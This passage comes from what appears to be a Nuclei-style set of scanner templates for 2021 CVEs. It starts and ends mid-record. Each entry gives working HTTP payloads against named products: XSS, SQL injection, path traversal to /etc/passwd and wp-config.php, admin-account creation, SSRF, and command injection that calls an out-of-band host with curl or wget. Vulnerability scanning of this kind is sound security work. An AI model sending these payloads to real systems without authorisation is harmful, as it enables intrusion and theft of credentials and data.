== 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-25016","info":{"name":"Chaty < 2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["search=</script><img src onerror=alert(document.domain)>","chaty_page_chaty"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43510","info":{"name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3d'1'--+-&password=as\n","GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["contains(header_1, \"text/html\")","status_code_1 == 200","contains(body_1, \"{\\\"status\\\":\\\"success\\\"}\")","contains(body_2, \"Welcome to Simple Client\")"],"condition":"and"}]}]},{"id":"CVE-2021-26702","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33690","info":{"name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /tc.CBS.Appl/tcspseudo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Could not connect to the CBS"]}]}]},{"id":"CVE-2021-45811","info":{"name":"osTicket 1.15.x - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /scp/login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"osticket\")"],"internal":true}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1\n","GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"FROM (SELECT\", \"topic_id_val\\'\\' IN NATURAL\", \"ORDER BY relevance\")"]}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","internal":true,"words":["IBM WebSphere Portal"]}]},{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-45382","info":{"name":"D-Link - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ddns_check.ccp"],"body":"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-38156","info":{"name":"Nagios XI < 5.8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/ajaxhelper.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=updatedashboard&id=home&opts=&title=\"><script>alert(document.domain)</script>&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}\n","GET /nagiosxi/dashboards/manage.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["data-title=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header_5","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true},{"type":"regex","name":"nsp_auth","part":"body","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: 